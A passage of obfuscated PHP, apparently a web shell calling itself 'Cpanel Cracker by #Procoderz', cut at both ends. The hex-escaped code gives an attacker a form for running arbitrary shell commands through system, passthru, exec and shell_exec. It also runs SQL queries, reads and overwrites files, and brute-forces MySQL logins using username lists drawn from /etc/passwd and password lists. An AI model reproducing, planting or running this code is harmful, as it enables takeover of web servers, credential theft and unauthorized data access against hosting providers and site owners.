]\x3c/b>\x3c/f\x6f\x6e\x74></\x64\x69v>";die();}if(!empty($_POST["\x63cc\x63"])&&$_POST["\x63\x63c\x63"]=="\x64\x62\x5f\x71uer\x79"){echo${${"\x47\x4cO\x42\x41\x4cS"}["\x6d\x6e\x6d\x7artd\x6c\x73"]};${${"\x47\x4cOB\x41L\x53"}["\x79\x75\x69\x72dc\x65h\x72\x76u"]}=new my_sql();$sql->db=$_POST["db"];${"\x47\x4cO\x42\x41\x4cS"}["\x62\x61j\x6e\x6d\x67\x6b\x73\x66"]="q\x75\x65ry\x73";$sql->host=$_POST["db\x5f\x73\x65\x72v\x65r"];$sql->port=$_POST["\x64\x62_p\x6f\x72t"];$sql->user=$_POST["m\x79\x73\x71l_l"];$sql->pass=$_POST["m\x79\x73q\x6c_\x70"];$sql->base=$_POST["\x6d\x79\x73ql_db"];${${"\x47L\x4fB\x41\x4c\x53"}["\x62\x61\x6an\x6d\x67ks\x66"]}=@explode("\x3b",$_POST["d\x62\x5fq\x75er\x79"]);echo"\x3c\x62o\x64\x79\x20bg\x63\x6fl\x6f\x72=\x23e\x34\x650\x648\x3e";if(!$sql->connect())echo"<di\x76\x20a\x6cign=cent\x65r\x3e<\x66o\x6e\x74 f\x61\x63\x65\x3dV\x65r\x64an\x61\x20\x73\x69ze\x3d-\x32 c\x6f\x6co\x72\x3d\x72\x65\x64\x3e<b\x3e".$sql->error."\x3c/\x62></f\x6fnt\x3e\x3c/d\x69\x76\x3e";else{if(!empty($sql->base)&&!$sql->select_db())echo"<di\x76 \x61\x6c\x69\x67n\x3d\x63ente\x72><\x66\x6fnt \x66\x61\x63e=\x56\x65\x72dana\x20si\x7a\x65\x3d-\x32\x20col\x6fr=\x72ed>\x3c\x62\x3e".$sql->error."</b>\x3c/font></di\x76\x3e";else{foreach(${${"\x47\x4c\x4f\x42\x41LS"}["bt\x79\x67\x77\x6c\x75"]} as${${"G\x4c\x4f\x42\x41LS"}["\x69\x76k\x76\x74i\x64\x6e\x6e"]}=>${${"\x47L\x4f\x42\x41\x4cS"}["f\x62\x61\x67\x78\x6f\x69mcf"]}){if(strlen(${${"GLOB\x41\x4c\x53"}["\x66\x62a\x67x\x6f\x69\x6dc\x66"]})>5){$cxexkcsqb="\x6e\x75\x6d";${"GL\x4f\x42\x41\x4c\x53"}["\x65\x72\x73\x62r\x70\x70\x69"]="\x61\x72";echo"<fon\x74 f\x61ce\x3dV\x65r\x64a\x6ea \x73ize=-\x32 \x63ol\x6f\x72=\x67\x72een><b>Q\x75er\x79#".${$cxexkcsqb}." :\x20".htmlspecialchars(${${"G\x4cO\x42\x41\x4cS"}["f\x62\x61gxoi\x6dc\x66"]},ENT_QUOTES)."</b\x3e\x3c/\x66ont><br\x3e";switch($sql->query(${${"GL\x4fB\x41\x4c\x53"}["\x66\x62\x61g\x78\x6f\x69m\x63f"]})){case"0":echo"\x3c\x74\x61ble\x20\x77i\x64\x74h\x3d\x31\x30\x30%\x3e<tr><\x74d><\x66o\x6e\x74 fa\x63\x65\x3d\x56\x65rdan\x61 \x73\x69\x7a\x65\x3d-2\x3e\x45r\x72\x6f\x72\x20:\x20\x3cb\x3e".$sql->error."\x3c/b\x3e</fo\x6e\x74\x3e</\x74\x64></tr\x3e\x3c/\x74\x61bl\x65\x3e";break;case"1":if($sql->get_result()){echo"\x3ctabl\x65\x20\x77i\x64t\x68=100\x25\x3e";${"GL\x4f\x42AL\x53"}["\x70\x6e\x78h\x76\x62kp\x6c"]="\x6b";$ippjfzvswwoy="\x6b\x65\x79s";foreach($sql->columns as${${"G\x4c\x4fB\x41\x4c\x53"}["\x70\x6e\x78h\x76b\x6bpl"]}=>${${"\x47\x4cOB\x41L\x53"}["\x78m\x63\x68x\x77\x73\x70\x72"]})$sql->columns[${${"\x47\x4c\x4fB\x41\x4c\x53"}["o\x79\x6b\x73\x73\x6c\x6a\x74\x76l\x7a"]}]=htmlspecialchars(${${"\x47\x4cOB\x41LS"}["x\x6dc\x68\x78\x77\x73pr"]},ENT_QUOTES);$cxvkonxdw="\x69";${${"GL\x4f\x42\x41L\x53"}["w\x63\x67\x72kl"]}=@implode("&\x6eb\x73\x70;\x3c/\x62></font></t\x64>\x3ct\x64\x20b\x67co\x6cor\x3d#8\x3000\x30\x30\x3e\x3cfon\x74 fa\x63\x65=\x56e\x72dana \x73iz\x65=-\x32\x3e\x3cb\x3e\x26nb\x73\x70\x3b",$sql->columns);echo"<\x74r\x3e<\x74d b\x67c\x6flo\x72\x3d#80000\x30><f\x6fnt\x20\x66\x61\x63e=\x56e\x72\x64\x61\x6ea\x20s\x69ze=-2\x3e<b>&n\x62\x73\x70\x3b".${$ippjfzvswwoy}."&\x6e\x62s\x70;</\x62>\x3c/\x66\x6f\x6et>\x3c/\x74\x64>\x3c/t\x72\x3e";for(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["sz\x66\x79\x6a\x6f\x70"]}=0;${${"GL\x4fB\x41\x4c\x53"}["s\x7a\x66\x79\x6a\x6f\x70"]}<$sql->num_rows;${$cxvkonxdw}++){$mtmuiruv="\x69";foreach($sql->rows[${${"\x47\x4c\x4fB\x41L\x53"}["\x73\x7a\x66yj\x6f\x70"]}]as${${"\x47\x4c\x4f\x42A\x4c\x53"}["oykss\x6c\x6at\x76lz"]}=>${${"GLO\x42A\x4c\x53"}["\x78\x6d\x63\x68x\x77s\x70r"]})$sql->rows[${${"\x47\x4c\x4fB\x41L\x53"}["\x73z\x66\x79jo\x70"]}][${${"GL\x4f\x42\x41\x4c\x53"}["\x6f\x79\x6bssl\x6a\x74\x76lz"]}]=htmlspecialchars(${${"\x47\x4c\x4f\x42\x41LS"}["xm\x63\x68x\x77\x73\x70r"]},ENT_QUOTES);${${"\x47\x4cO\x42\x41L\x53"}["\x73qo\x77\x63\x71x"]}=@implode("&\x6eb\x73\x70\x3b\x3c/\x66o\x6et></\x74\x64\x3e<\x74\x64>\x3c\x66\x6fnt f\x61ce=Ve\x72\x64\x61\x6e\x61\x20\x73iz\x65=-\x32>\x26n\x62s\x70\x3b",$sql->rows[${$mtmuiruv}]);echo"<\x74r>\x3ctd><\x66\x6fnt\x20\x66\x61\x63e\x3d\x56e\x72d\x61n\x61\x20si\x7a\x65\x3d-\x32>&nb\x73\x70\x3b".${${"GLO\x42\x41\x4c\x53"}["\x73\x71\x6f\x77\x63q\x78"]}."\x26\x6e\x62\x73\x70\x3b</f\x6f\x6e\x74></td></t\x72>";}echo"</ta\x62l\x65>";}break;case"\x32":${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x65\x72\x73\x62\x72\x70pi"]}=$sql->affected_rows()?($sql->affected_rows()):("0");echo"<\x74\x61\x62\x6ce\x20\x77i\x64th=100%>\x3c\x74\x72>\x3c\x74d\x3e\x3c\x66ont\x20fac\x65=Ver\x64\x61n\x61 s\x69\x7a\x65=-2\x3e\x61f\x66e\x63\x74\x65\x64 \x72o\x77s\x20: \x3c\x62>".${${"G\x4cO\x42\x41\x4c\x53"}["pw\x64\x66\x76p\x6e\x69\x64\x64"]}."\x3c/b\x3e</\x66o\x6e\x74\x3e</t\x64></t\x72></tab\x6ce\x3e<\x62\x72>";break;}}}}}echo"\x3c\x62r>\x3c\x74it\x6ce\x3e\x43pa\x6e\x65l \x43ra\x63\x6b\x65\x72\x20by #\x50\x72\x6f\x63o\x64\x65\x72\x7a\x3c/\x74itle\x3e\x3c\x66\x6frm n\x61me=\x66or\x6d \x6d\x65t\x68\x6fd\x3dPO\x53T\x3e";echo in("\x68id\x64\x65n","\x64b",0,$_POST["\x64b"]);echo in("h\x69dde\x6e","d\x62_s\x65r\x76\x65r",0,$_POST["db_\x73\x65r\x76\x65\x72"]);echo in("\x68id\x64\x65\x6e","d\x62\x5fpo\x72t",0,$_POST["\x64b\x5fpor\x74"]);echo in("\x68\x69dde\x6e","\x6d\x79s\x71\x6c_l",0,$_POST["\x6dy\x73\x71l_\x6c"]);echo in("\x68\x69dde\x6e","\x6d\x79\x73\x71l\x5f\x70",0,$_POST["my\x73ql_p"]);echo in("h\x69\x64\x64en","\x6d\x79\x73q\x6c\x5f\x64b",0,$_POST["my\x73\x71l_db"]);echo in("hid\x64e\x6e","\x63\x63cc",0,"d\x62_\x71\x75\x65\x72\x79");echo"<d\x69\x76\x20a\x6ci\x67\x6e\x3dc\x65nter\x3e";echo"<fo\x6et \x66\x61\x63e\x3dVe\x72da\x6ea\x20\x73i\x7a\x65\x3d-2\x3e<b>Ba\x73\x65: \x3c/\x62\x3e<\x69n\x70\x75\x74\x20\x74\x79\x70e\x3d\x74\x65\x78\x74\x20\x6e\x61\x6d\x65=\x6d\x79s\x71\x6c\x5fd\x62 \x76\x61\x6cu\x65\x3d\x22".$sql->base."\">\x3c/f\x6fn\x74>\x3c\x62r\x3e";echo"<\x74ex\x74\x61\x72e\x61 c\x6f\x6c\x73=\x365 \x72o\x77s\x3d10 n\x61m\x65\x3d\x64b\x5fq\x75e\x72\x79>".(!empty($_POST["\x64\x62_que\x72y"])?($_POST["\x64\x62_\x71ue\x72\x79"]):("\x53H\x4fW\x20DA\x54A\x42\x41\x53E\x53;\nS\x45L\x45C\x54\x20*\x20\x46\x52OM\x20\x75\x73\x65\x72\x3b"))."\x3c/\x74\x65\x78t\x61\x72e\x61\x3e\x3c\x62\x72\x3e<i\x6e\x70ut \x74yp\x65=\x73u\x62m\x69\x74 \x6e\x61\x6d\x65=subm\x69t\x20val\x75e=\" Run SQ\x4c\x20\x71u\x65r\x79 \x22\x3e</\x64\x69\x76\x3e\x3c\x62r>\x3c\x62r\x3e";echo"</fo\x72\x6d\x3e";echo"\x3cbr>\x3cdiv a\x6ci\x67n\x3dc\x65n\x74er>\x3c\x66\x6fnt\x20\x66ac\x65\x3d\x56er\x64\x61\x6ea\x20\x73i\x7a\x65\x3d-2><\x62\x3e[\x20\x3ca\x20\x68ref=".$_SERVER["\x50HP_\x53\x45L\x46"]."\x3e\x42ACK\x3c/a>\x20]\x3c/\x62></fo\x6e\x74\x3e\x3c/\x64iv\x3e";die();}function ccmmdd($ccmmdd2,$att){global$ccmmdd2,$att;echo"\n<\x74abl\x65\x20\x73\x74\x79\x6c\x65=\"wid\x74h: 1\x30\x30%\"\x20cla\x73\x73=\x22\x73\x74\x79\x6c\x651\"\x20dir=\"r\x74l\x22\x3e\n\t<\x74\x72\x3e\n\t\t\x3c\x74d \x63\x6c\x61\x73s=\"s\x74y\x6c\x65\x39\x22\x3e<st\x72\x6fng>U\x6ct\x69\x6dat\x65 \x63Pa\x6eel\x20\x43ra\x63k\x65r\x3c/s\x74\x72\x6fn\x67\x3e</t\x64\x3e\n\t</t\x72\x3e\n\t<\x74r\x3e\n\t\t<t\x64 \x63lass=\"\x73\x74yle13\"\x3e\n\t\t\t\t\x3cf\x6frm\x20m\x65t\x68od=\x22\x70o\x73t\x22\x3e\n\t\t\t\t\t<s\x65le\x63t\x20n\x61\x6de=\"a\x74\x74\"\x20\x64\x69r=\"r\x74\x6c\" sty\x6ce\x3d\x22h\x65igh\x74:\x201\x309\x70\x78\x22 \x73\x69\x7ae\x3d\"6\">\n";if($_POST["\x61tt"]==null){echo"\t\t\t\t\t\t\x3copt\x69o\x6e\x20va\x6cue=\"s\x79\x73\x74\x65\x6d\" s\x65\x6c\x65\x63t\x65d\x3d\"\"\x3es\x79\x73t\x65\x6d</opt\x69\x6fn>";}else{echo"\t\t\t\t\t\t<\x6fpti\x6f\x6e\x20va\x6c\x75e\x3d\x27$_POST[att]' sele\x63t\x65\x64\x3d'\x27\x3e$_POST[att]</\x6f\x70\x74\x69on>\n\t\t\t\t\t\t\x3co\x70t\x69\x6f\x6e\x20\x76\x61lu\x65\x3ds\x79stem>s\x79\x73\x74\x65\x6d</o\x70\x74i\x6fn>\n";}echo"\n\t\t\t\t\t\t\x3copti\x6f\x6e \x76\x61l\x75e\x3d\x22passt\x68r\x75\x22\x3e\x70asst\x68r\x75\x3c/opti\x6fn>\n\t\t\t\t\t\t<op\x74i\x6f\x6e \x76\x61\x6c\x75e=\"e\x78\x65\x63\x22\x3ee\x78\x65c</\x6f\x70\x74\x69on>\n\t\t\t\t\t\t\x3c\x6f\x70\x74ion\x20\x76al\x75\x65\x3d\"she\x6cl_e\x78\x65\x63\x22\x3es\x68el\x6c_e\x78\x65\x63</op\x74io\x6e>\t\n\t\t\t\t\t\x3c/\x73ele\x63t>\n\t\t\t\t\t\t<input\x20nam\x65=\x22page\"\x20va\x6cu\x65=\"c\x63\x6d\x6d\x64d\" type\x3d\"\x68\x69dd\x65n\x22\x3e\x3c\x62\x72>\n\t\t\t\t\t\t<\x69\x6eput\x20d\x69\x72\x3d\x22\x6ctr\x22 n\x61\x6d\x65\x3d\x22\x63c\x6dmdd2\x22\x20\x73t\x79\x6c\x65\x3d\x22wi\x64\x74\x68:\x20\x317\x33\x70x\x22 ty\x70e\x3d\"\x74ex\x74\" val\x75e=\"";if(!$_POST["\x63\x63m\x6dd\x64\x32"]){echo"dir";}else{echo$_POST["\x63\x63mmdd2"];}echo"\x22\x3e<\x62r>\n\t\t\t\t\t\t<i\x6epu\x74\x20\x74ype\x3d\x22\x73\x75\x62mit\x22\x20value\x3d\"?????\">\n\t\t\t\t\x3c/\x66\x6frm>\n\t\t\n\t\t\x3c/\x74\x64\x3e\n\t\x3c/t\x72>\n\t\x3c\x74\x72\x3e\n\t\t<t\x64\x20\x63lass=\"s\x74y\x6c\x651\x33\"\x3e\n";if($_POST[att]=="\x73\x79s\x74\x65\x6d"){echo"\n\t\t\t\t\t\x3c\x74\x65\x78ta\x72\x65a\x20d\x69r=\x22\x6ct\x72\" na\x6de\x3d\x22\x54ex\x74\x41\x72\x65\x61\x31\x22\x20\x73t\x79le=\"\x77id\x74h: \x374\x35\x70x\x3b\x20\x68\x65i\x67\x68t: \x3204\x70\x78\x22\x3e";system($_POST["ccmmd\x642"]);echo"\t\t\t\t\t\x3c/tex\x74ar\x65a\x3e";}if($_POST[att]=="pa\x73\x73\x74\x68r\x75"){echo"\n\t\t\t\t\t\x3c\x74e\x78ta\x72\x65a\x20\x64ir=\x22ltr\"\x20\x6e\x61\x6de=\"\x54e\x78\x74\x41r\x65a\x31\x22 \x73\x74y\x6ce=\x22w\x69dt\x68:\x20\x37\x34\x35p\x78; h\x65i\x67ht: 20\x34\x70x\"\x3e";passthru($_POST["\x63c\x6dmdd\x32"]);echo"\t\t\t\t\t\x3c/\x74extare\x61\x3e";}if($_POST[att]=="ex\x65c"){echo"\t\t\t\t\t\x3c\x74e\x78\x74a\x72\x65a \x64i\x72=\"\x6ctr\x22 n\x61\x6de=\x22\x54ex\x74A\x72\x65a1\x22\x20s\x74y\x6c\x65\x3d\"\x77i\x64th: \x37\x34\x35\x70x; \x68\x65\x69\x67ht:\x2020\x34p\x78\x22>";exec($_POST["\x63cmm\x64d2"],${${"\x47LO\x42\x41\x4c\x53"}["\x73\x6b\x7am\x6a\x70\x79gb\x64\x62"]});${"G\x4c\x4f\x42\x41\x4cS"}["\x62tuu\x73e\x64w\x6c\x65"]="res";echo${${"GLO\x42\x41\x4cS"}["\x62\x74\x75u\x73\x65\x64\x77l\x65"]}=join("\n",${${"\x47L\x4f\x42\x41\x4c\x53"}["sk\x7a\x6dj\x70\x79\x67\x62\x64\x62"]});echo"\t\t\t\t\t\x3c/t\x65xta\x72\x65a>";}if($_POST[att]=="\x73h\x65\x6c\x6c\x5f\x65x\x65\x63"){echo"\t\t\t\t\t\x3c\x74\x65\x78\x74area\x20di\x72=\"l\x74r\x22 \x6eame=\"\x54e\x78\x74Ar\x65\x611\x22 \x73t\x79le=\x22w\x69d\x74h: \x3745\x70\x78; h\x65\x69g\x68\x74: \x320\x34\x70\x78\x22>";echo	shell_exec($_POST["c\x63mmd\x64\x32"]);echo"\t\t\t\t\t\x3c/t\x65x\x74\x61\x72\x65a>";}echo"\t\t\n\t\t\x3c/\x74\x64\x3e\n\t\x3c/\x74\x72\x3e\n</\x74a\x62\x6ce\x3e\n";exit;}if($_POST["pa\x67e"]=="\x65\x64\x69t"){$rvssqn="c\x6fd\x65";$bewvoxboez="f\x70";$wsijdqpa="\x63\x6f\x64\x65";${${"\x47\x4cOB\x41\x4cS"}["\x6c\x76\x74\x66\x6a\x69\x73\x6bw"]}=@str_replace("\r\n","\n",$_POST["c\x6fd\x65"]);${$wsijdqpa}=@str_replace("\x5c","",${$rvssqn});${${"\x47\x4c\x4f\x42A\x4c\x53"}["tp\x79e\x74\x6cr"]}=fopen(${${"\x47\x4cO\x42\x41L\x53"}["\x74v\x6f\x69\x64\x73\x74"]},"w");$rffjtucfpqm="\x66\x70";fwrite(${$bewvoxboez},"$code");fclose(${$rffjtucfpqm});echo"<\x63e\x6e\x74e\x72\x3e<b>\x4fK Edit\x3cb\x72\x3e\x3c\x62r\x3e\x3cbr><\x62\x72><\x61\x20\x68ref=".$_SERVER["\x50HP\x5fSELF"]."><~\x20BAC\x4b</\x61>";exit;}if($_POST["p\x61g\x65"]=="\x73\x68ow"){$ycmhdxyicsp="\x73\x61h\x61\x63ke\x72";${${"G\x4cOBA\x4c\x53"}["\x74\x76\x6f\x69ds\x74"]}=$_POST["\x70\x61\x74h\x63\x6c\x61s\x73"];${"\x47\x4c\x4fB\x41L\x53"}["\x66\x61q\x69\x61\x79\x67"]="\x70at\x68cl\x61\x73\x73";${"GLOB\x41L\x53"}["\x63wh\x70\x72\x64\x67\x72"]="\x63od\x65";$toglrqxps="\x63\x6fde";$wnenonpnkqs="s\x61\x68a\x63\x6b\x65\x72";$haaklxkkkqe="\x63o\x64e";${"G\x4cO\x42\x41\x4cS"}["ki\x68\x6ezng"]="\x70a\x74h\x63l\x61\x73s";echo"\n\x3c\x66\x6fr\x6d\x20m\x65t\x68\x6f\x64\x3d\"P\x4f\x53\x54\x22\x3e\n\x3ci\x6e\x70\x75t\x20\x74\x79pe=\x22\x68i\x64den\x22\x20\x6eam\x65\x3d\x22\x70ag\x65\"\x20\x76\x61l\x75\x65=\x22\x65d\x69\x74\x22>\n";${$wnenonpnkqs}=fopen(${${"\x47\x4cO\x42\x41L\x53"}["\x6bi\x68n\x7a\x6eg"]},"rb");echo"<ce\x6e\x74\x65r\x3e".${${"G\x4cO\x42A\x4c\x53"}["\x66\x61q\x69\x61\x79\x67"]}."<\x62\x72>\x3ctex\x74ar\x65\x61\x20\x64\x69\x72=\"\x6ct\x72\"\x20n\x61\x6d\x65\x3d\"\x63o\x64e\"\x20\x73tyl\x65\x3d\"\x77id\x74h: \x3845\x70\x78\x3b\x20\x68\x65igh\x74:\x20\x3404\x70x\x22>";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63w\x68\x70rd\x67\x72"]}=fread(${$ycmhdxyicsp},filesize(${${"\x47L\x4fBA\x4cS"}["t\x76\x6fi\x64st"]}));echo${$toglrqxps}=htmlspecialchars(${$haaklxkkkqe});echo"\x3c/\x74\x65\x78\x74\x61\x72ea\x3e";fclose(${${"\x47L\x4fB\x41LS"}["q\x6f\x77e\x73\x64p"]});echo"\n<\x62r><\x69nput t\x79pe=\x22t\x65xt\x22\x20\x6e\x61\x6d\x65\x3d\x22\x70\x61t\x68c\x6cas\x73\x22\x20v\x61lue=\"".${${"G\x4c\x4f\x42\x41\x4cS"}["\x74void\x73\x74"]}."\x22 \x73tyle\x3d\x22\x77\x69\x64th: 4\x345px\x3b\"\x3e\n<\x62r>\x3c\x73\x74\x72on\x67\x3e\x3cinpu\x74 ty\x70e\x3d\x22su\x62\x6d\x69t\" \x76\x61\x6cu\x65\x3d\x22e\x64i\x74 \x66\x69\x6ce\x22\x3e\n\x3c/f\x6f\x72m>\n";exit;}if($_POST["p\x61\x67\x65"]=="\x63\x63mmd\x64"){${"G\x4cO\x42A\x4c\x53"}["\x6b\x67s\x6c\x74b\x66\x6a"]="\x63cmm\x64\x64\x32";echo ccmmdd(${${"\x47\x4c\x4fB\x41\x4cS"}["\x6b\x67\x73\x6c\x74b\x66j"]},${${"GLO\x42\x41\x4cS"}["\x6a\x6e\x77tdj\x65\x62"]});exit;}if($_POST["\x70age"]=="f\x69\x6e\x64"){if(isset($_POST["u\x73ern\x61mes"])&&isset($_POST["\x70a\x73s\x77o\x72d\x73"])){$khkloqz="user\x6e\x61\x6d\x65";if($_POST["t\x79\x70\x65"]=="p\x61\x73s\x77d"){${"\x47\x4cO\x42\x41L\x53"}["h\x72\x75\x78\x6b\x63\x6c\x68"]="e";${${"\x47\x4cOB\x41\x4cS"}["h\x72\x75\x78k\x63lh"]}=explode("\n",$_POST["\x75s\x65rna\x6d\x65\x73"]);foreach(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x75\x63\x6eib\x67y\x67\x64q"]} as${${"G\x4c\x4f\x42\x41\x4c\x53"}["o\x69\x62bfuc\x64c"]}){$npbsicjri="\x76alu\x65";${${"\x47L\x4f\x42\x41L\x53"}["o\x79k\x73\x73\x6c\x6at\x76\x6c\x7a"]}=explode(":",${$npbsicjri});${${"\x47L\x4f\x42\x41\x4cS"}["l\x73\x63\x63xrn\x62h\x77"]}.=${${"\x47\x4c\x4fB\x41L\x53"}["oy\x6bssl\x6a\x74v\x6c\x7a"]}["0"]." ";}}elseif($_POST["\x74y\x70e"]=="s\x69\x6d\x70le"){${${"G\x4c\x4f\x42A\x4c\x53"}["\x6cs\x63\x63\x78r\x6e\x62\x68\x77"]}=str_replace("\n"," ",$_POST["\x75s\x65rna\x6d\x65\x73"]);}$xgqckjprblr="\x611";${$xgqckjprblr}=explode(" ",${$khkloqz});${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x7am\x65\x72lg\x7a\x6b"]}=explode("\n",$_POST["p\x61s\x73\x77\x6f\x72ds"]);${${"\x47LO\x42\x41L\x53"}["r\x72\x6b\x66v\x75y\x74"]}=count(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x7a\x6der\x6c\x67\x7ak"]});${${"\x47\x4c\x4f\x42\x41\x4cS"}["k\x70\x6d\x62\x72o\x64"]}=0;foreach(${${"GLO\x42\x41LS"}["\x73r\x70\x75\x63\x63\x75ng"]} as${${"G\x4cO\x42\x41\x4c\x53"}["mp\x6b\x71zb\x75\x64ys\x65"]}){if(${${"G\x4cO\x42\x41LS"}["\x6d\x70\x6b\x71\x7a\x62u\x64\x79se"]}!==""){$ulbrgxfihqki="\x75se\x72";$ydybrefvjub="\x69";${"\x47L\x4f\x42\x41LS"}["\x6b\x63\x76bi\x6eikn\x71"]="\x69";${"\x47LOBA\x4c\x53"}["n\x76\x64\x78q\x65\x64\x67j"]="\x75\x73\x65\x72";${$ulbrgxfihqki}=trim(${${"GL\x4fB\x41L\x53"}["nv\x64\x78q\x65\x64\x67j"]});for(${${"\x47L\x4f\x42A\x4cS"}["\x6b\x63\x76bi\x6e\x69kn\x71"]}=0;${${"\x47L\x4fB\x41\x4c\x53"}["\x73\x7a\x66\x79\x6ao\x70"]}<=${${"\x47LO\x42\x41\x4cS"}["rr\x6bf\x76uyt"]};${$ydybrefvjub}++){$xmmycmyvjwrh="u\x73\x65\x72";${${"\x47\x4c\x4fB\x41\x4c\x53"}["h\x72q\x70jl"]}=trim(${${"\x47L\x4fBA\x4c\x53"}["\x7am\x65r\x6cg\x7a\x6b"]}[${${"\x47\x4c\x4f\x42AL\x53"}["\x73z\x66\x79\x6a\x6f\x70"]}]);if(@mysql_connect("l\x6f\x63\x61lh\x6f\x73t",${$xmmycmyvjwrh},${${"GL\x4fBA\x4cS"}["\x68\x72\x71p\x6a\x6c"]})){echo"Pr\x6f\x63\x6f\x64e\x72z\x7e\x20us\x65\x72\x20is\x20(\x3cb\x3e<\x66ont\x20\x63\x6flor=\x67re\x65\x6e\x3e$user</fo\x6et\x3e\x3c/\x62>)\x20\x50ass\x77ord\x20is\x20(<b\x3e\x3cfo\x6et \x63\x6flor\x3d\x67\x72e\x65\x6e>$pass\x3c/\x66on\x74></\x62>)\x3cbr /\x3e";$cwcsyolw="o\x6b";${$cwcsyolw}++;}}}}echo"<\x68r\x3e\x3cb\x3e\x59\x6f\x75\x20\x46o\x75\x6ed\x20\x3cfon\x74 \x63\x6flor\x3d\x67re\x65\x6e\x3e$ok</font\x3e Cp\x61\x6e\x65\x6c (P\x72o\x63oderz)</\x62\x3e";echo"\x3c\x63\x65nt\x65\x72>\x3cb><a\x20h\x72e\x66=".$_SERVER["\x50HP\x5f\x53ELF"]."><~\x20\x42A\x43\x4b\x3c/a\x3e";exit;}}echo "\n\n\n\n<f\x6frm m\x65\x74h\x6f\x64=\x22P\x4fST\x22\x20ta\x72g\x65t\x3d\x22\x5f\x62\x6c\x61\x6ek\x22\x3e\n\t\x3cs\x74rong>\n<in\x70u\x74\x20n\x61\x6de=\x22pa\x67\x65\x22\x20\x74\x79p\x65=\"hid\x64e\x6e\"\x20\x76a\x6cue\x3d\"\x66\x69nd\">\x20\x20  \x20\x20\x20 \t\t\t\t\n    \x3c/st\x72o\x6e\x67\x3e\n\x20   \x3c\x74\x61\x62\x6ce\x20widt\x68\x3d\"6\x30\x30\"\x20\x62o\x72\x64er\x3d\"\x30\"\x20cel\x6cpa\x64ding\x3d\x22\x33\" \x63el\x6cspacing\x3d\x221\" \x61\x6ci\x67\x6e=\x22ce\x6et\x65r\x22>\n  \x20\x20<t\x72>\n\x20 \x20 \x20\x20\x20 <t\x64\x20v\x61\x6c\x69\x67n\x3d\"top\x22 \x62g\x63o\x6c\x6f\x72\x3d\"\x23\x31\x3515\x31\x35\x22\x3e\x3c\x63\x65\x6ete\x72\x3e\x3c\x73\x74\x72o\x6eg><i\x6dg\x20\x73rc\x3d\"\x68\x74t\x70://\x69.\x69\x6d\x67\x75r\x2eco\x6d/\x67q\x71\x51gz\x77.\x70ng\"\x20/><br>\n\t\t</s\x74\x72\x6f\x6eg\x3e\n\t\t</\x63enter>\x3c/\x74d>\n\x20 \x20 \x3c/t\x72>\n  \x20\x20\x3ctr\x3e\n \x20  \x3ctd\x3e\n\x20 \x20 \x3ctab\x6ce \x77i\x64\x74h\x3d\"1\x30\x30%\"\x20b\x6frd\x65r=\x220\x22 \x63el\x6c\x70add\x69\x6eg=\"3\"\x20c\x65\x6clspa\x63\x69ng\x3d\x22\x31\" a\x6cig\x6e\x3d\"ce\x6et\x65r\x22>\n\x20\x20\x20 <td\x20v\x61\x6c\x69g\x6e\x3d\x22top\x22\x20\x62gco\x6co\x72\x3d\x22#\x31515\x31\x35\x22\x20c\x6c\x61\x73\x73=\"s\x74y\x6c\x652\x22 sty\x6ce\x3d\"\x77\x69d\x74\x68: \x31\x339px\x22\x3e\n\t<\x73t\x72o\x6e\x67>U\x73\x65r\x20:\x3c/s\x74ro\x6e\x67>\x3c/\x74\x64>\n \x20 \x20\x3c\x74d\x20va\x6c\x69g\x6e=\"\x74o\x70\x22 b\x67\x63olo\x72=\x22\x2315\x315\x315\" \x63olsp\x61\x6e\x3d\x225\x22\x3e\x3c\x73\x74\x72\x6fn\x67\x3e<t\x65x\x74a\x72\x65a c\x6fls=\"8\x30\x22\x20\x72\x6fw\x73=\x22\x35\x22\x20\x6eam\x65=\"\x75\x73e\x72n\x61m\x65s\"></\x74\x65x\x74are\x61>\x3c/st\x72\x6f\x6e\x67>\x3c/\x74d\x3e\n\x20\x20\x20 </tr>\n  \x20 \x3ctr>\n\x20  \x20\x3c\x74\x64 valig\x6e\x3d\x22\x74o\x70\" \x62\x67\x63ol\x6fr=\x22\x23\x315\x315\x31\x35\" \x63lass=\"st\x79\x6c\x652\x22 sty\x6ce=\x22widt\x68:\x20139px\">\n\t\x3cs\x74ro\x6e\x67\x3e\x50\x61s\x73 :\x3c/s\x74\x72\x6fng></td>\n\x20   <\x74\x64 va\x6cign=\"top\x22\x20bg\x63\x6f\x6c\x6f\x72\x3d\"#1\x3515\x31\x35\"\x20\x63ol\x73pa\x6e=\"5\">\x3c\x73t\x72o\x6e\x67\x3e\x3ctexta\x72ea c\x6f\x6cs=\"80\" \x72ows=\x22\x35\x22\x20\x6e\x61\x6d\x65=\"\x70\x61\x73s\x77\x6fr\x64s\x22\x3e\x3c/\x74ex\x74a\x72\x65\x61></stro\x6e\x67>\x3c/t\x64>\n\x20\x20\x20 \x3c/\x74\x72>\n  \x20\x20\x3ctr\x3e\n\x20  \x20<td \x76\x61l\x69\x67\x6e\x3d\x22t\x6fp\x22\x20b\x67c\x6f\x6c\x6fr\x3d\x22#1\x35\x31\x351\x35\x22 c\x6ca\x73\x73=\"st\x79\x6c\x65\x32\x22\x20\x73tyle\x3d\"w\x69\x64\x74h: \x31\x339px\">\n\t<\x73t\x72\x6fn\x67>T\x79p\x65\x20:</\x73\x74rong></\x74d>\n    <td\x20\x76ali\x67\x6e=\x22\x74\x6fp\"\x20b\x67\x63olo\x72=\x22#1\x35\x315\x31\x35\" \x63\x6f\x6c\x73\x70an\x3d\"5\x22>\n\x20 \x20\x20<s\x70an class\x3d\"\x73t\x79\x6ce\x32\"><s\x74ron\x67>\x53impl\x65 :\x20</s\x74\x72\x6fng> \x3c/sp\x61\x6e>\n\t<\x73\x74ro\x6eg\x3e\n\t<\x69\x6ep\x75t\x20\x74yp\x65=\"\x72\x61\x64\x69\x6f\x22 n\x61\x6d\x65\x3d\"t\x79p\x65\"\x20\x76\x61l\x75e=\x22s\x69\x6d\x70\x6c\x65\x22\x20ch\x65c\x6b\x65d=\x22che\x63\x6be\x64\x22\x20\x63l\x61s\x73=\"\x73t\x79le\x33\x22\x3e\x3c/\x73t\x72o\x6e\x67>\n\x20\x20  <\x66\x6f\x6e\x74\x20c\x6cas\x73=\"s\x74y\x6ce2\">\x3c\x73tr\x6f\x6e\x67>/etc/\x70\x61ssw\x64 : </s\x74\x72o\x6e\x67> 